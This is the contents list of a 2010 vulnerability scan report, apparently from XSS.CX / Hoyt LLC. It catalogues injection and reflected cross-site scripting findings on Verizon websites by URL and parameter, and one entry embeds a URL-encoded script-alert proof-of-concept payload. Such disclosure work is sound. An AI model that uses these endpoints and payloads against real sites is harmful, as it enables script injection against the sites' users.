Report generated by XSS.CX at Fri Nov 19 21:15:35 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

1. SQL injection

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. https://auth.verizon.com/amserver/UI/Login [goto parameter]

3.2. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

3.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

3.4. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

3.5. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceId parameter]

3.6. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceType parameter]

3.7. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 4]

3.8. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 5]

3.9. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 6]

3.10. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [audio_conf parameter]

3.11. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [bbaw parameter]

3.12. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [connex parameter]

3.13. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiostvown parameter]

3.14. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiosvoice parameter]

3.15. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [msp parameter]

3.16. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]

3.17. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [npa parameter]

3.18. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [nxx parameter]

3.19. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [online_backup parameter]

3.20. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [partner parameter]

3.21. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcity parameter]

3.22. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcounty parameter]

3.23. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popdma parameter]

3.24. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popindicator parameter]

3.25. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popip parameter]

3.26. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popservice parameter]

3.27. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popstate parameter]

3.28. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popzipcode parameter]

3.29. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [prizm parameter]

3.30. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pts parameter]

3.31. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pws parameter]

3.32. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [search parameter]

3.33. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [sec_email parameter]

3.34. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_enh_msg parameter]

3.35. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_premmail parameter]

3.36. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [usertype parameter]

3.37. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vasonly parameter]

3.38. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vec parameter]

3.39. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodfamily parameter]

3.40. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodunlim parameter]

3.41. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [viss parameter]

3.42. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vsbb parameter]

3.43. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webex parameter]

3.44. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webhosting parameter]

3.45. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 4]

3.46. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 5]

3.47. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

3.48. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

3.49. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [audio_conf parameter]

3.50. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [bbaw parameter]

3.51. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [connex parameter]

3.52. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiostvown parameter]

3.53. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiosvoice parameter]

3.54. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [msp parameter]

3.55. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]

3.56. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [npa parameter]

3.57. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [nxx parameter]

3.58. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [online_backup parameter]

3.59. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [partner parameter]

3.60. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcity parameter]

3.61. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcounty parameter]

3.62. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popdma parameter]

3.63. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popindicator parameter]

3.64. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popip parameter]

3.65. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popservice parameter]

3.66. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popstate parameter]

3.67. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popzipcode parameter]

3.68. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [prizm parameter]

3.69. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pts parameter]

3.70. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pws parameter]

3.71. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [search parameter]

3.72. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [sec_email parameter]

3.73. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_enh_msg parameter]

3.74. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_premmail parameter]

3.75. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [usertype parameter]

3.76. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vasonly parameter]

3.77. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodfamily parameter]

3.78. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodunlim parameter]

3.79. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [viss parameter]

3.80. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webex parameter]

3.81. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webhosting parameter]

3.82. http://syndicate.verizon.net/ads/js.ashx [page parameter]

3.83. http://syndicate.verizon.net/ads/js.ashx [pos parameter]

3.84. http://wapp.verizon.net/bookmarks/bmredirex.asp [WT.ti parameter]

3.85. http://wapp.verizon.net/bookmarks/bmredirex.asp [channel parameter]

3.86. http://wapp.verizon.net/bookmarks/bmredirex.asp [clientid parameter]

3.87. http://wapp.verizon.net/bookmarks/bmredirex.asp [name of an arbitrarily supplied request parameter]

3.88. http://wapp.verizon.net/bookmarks/bmredirex.asp [q parameter]

3.89. http://wapp.verizon.net/bookmarks/bmredirex.asp [web_search_type parameter]

3.90. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [WT.ti parameter]

3.91. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [channel parameter]

3.92. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [clientid parameter]

3.93. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [name of an arbitrarily supplied request parameter]

3.94. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [q parameter]

3.95. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [web_search_type parameter]

3.96. http://www.verizon.net/central/bookmark [WT.ti parameter]

3.97. http://www.verizon.net/central/bookmark [channel parameter]

3.98. http://www.verizon.net/central/bookmark [clientid parameter]

3.99. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]

3.100. http://www.verizon.net/central/bookmark [q parameter]

3.101. http://www.verizon.net/central/bookmark [web_search_type parameter]

3.102. https://www.verizon.net/ssowebapp/VOLPortalLogin [clientId parameter]

3.103. http://www.verizonwireless.com/b2c/store/controller [action parameter]

3.104. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]

3.105. http://www.verizonwireless.com/b2c/store/controller [item parameter]

3.106. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]

3.107. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]

3.108. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

3.109. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

3.110. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

3.111. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter]

3.112. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

3.113. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

3.114. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter]

3.115. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

3.116. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter]

3.117. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter]

3.118. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter]

3.119. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]

3.120. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]

3.121. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter]

3.122. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter]

3.123. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

3.124. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

3.125. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

3.126. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter]

3.127. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]

3.128. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]

3.129. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]

3.130. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter]

3.131. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]

3.132. https://www22.verizon.com/myverizon/ [goto parameter]

3.133. https://www22.verizon.com/myverizon/ [goto parameter]

3.134. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]

3.135. https://www36.verizon.com/FiOSVoice/members/CallsandMessages.aspx [REST URL parameter 2]

3.136. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

3.137. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

3.138. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

3.139. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

3.140. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

3.141. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie]

3.142. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie]

3.143. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie]

3.144. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

3.145. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

3.146. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie]

3.147. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie]

3.148. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie]

3.149. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie]

3.150. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie]

3.151. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

3.152. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

3.153. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

3.154. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

3.155. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

3.156. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

3.157. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

3.158. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

3.159. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

3.160. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

3.161. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

3.162. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

3.163. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

3.164. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

3.165. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

3.166. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

3.167. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

3.168. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

3.169. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

3.170. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

3.171. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

3.172. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

3.173. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

3.174. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

3.175. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

3.176. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

3.177. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

3.178. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

3.179. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

3.180. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

3.181. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

3.182. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

3.183. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

3.184. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

3.185. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

3.186. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie]

3.187. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

3.188. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

3.189. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

3.190. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

3.191. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

3.192. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

3.193. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

3.194. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

3.195. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

3.196. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

3.197. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

3.198. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

3.199. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

3.200. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

3.201. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

3.202. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

3.203. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

3.204. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

3.205. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

3.206. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

3.207. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

3.208. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

3.209. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

3.210. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

3.211. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

3.212. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

3.213. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

3.214. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

3.215. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

3.216. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

3.217. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

3.218. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

3.219. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

3.220. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

3.221. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

3.222. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

3.223. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

3.224. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

3.225. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

3.226. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

3.227. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

3.228. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

3.229. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

3.230. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

3.231. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

3.232. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

3.233. http://www22.verizon.com/Residential/Services/ [vzapps cookie]

3.234. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie]

3.235. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie]

3.236. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie]

3.237. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

3.238. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

3.239. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

3.240. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

3.241. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

3.242. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

3.243. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

3.244. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

3.245. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

3.246. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

3.247. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

3.248. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

3.249. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

3.250. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

3.251. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

3.252. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

3.253. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

3.254. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

3.255. http://www22.verizon.com/residential/internet [vzapps cookie]

3.256. http://www22.verizon.com/residential/internet [vzapps cookie]

3.257. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie]

3.258. http://www22.verizon.com/residentialhelp [ECSPCookies cookie]

3.259. http://www22.verizon.com/residentialhelp [vzapps cookie]

3.260. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]

3.261. http://www22.verizon.com/residentialhelp/ [vzapps cookie]

3.262. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

3.263. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

3.264. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie]

3.265. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

3.266. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

3.267. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie]

3.268. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

3.269. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

3.270. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

3.271. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie]

3.272. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

3.273. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

3.274. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie]

3.275. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

3.276. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

3.277. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]

3.278. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

3.279. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

3.280. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie]

3.281. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie]

3.282. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

3.283. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

3.284. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie]

3.285. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

3.286. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

3.287. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie]

3.288. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

3.289. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

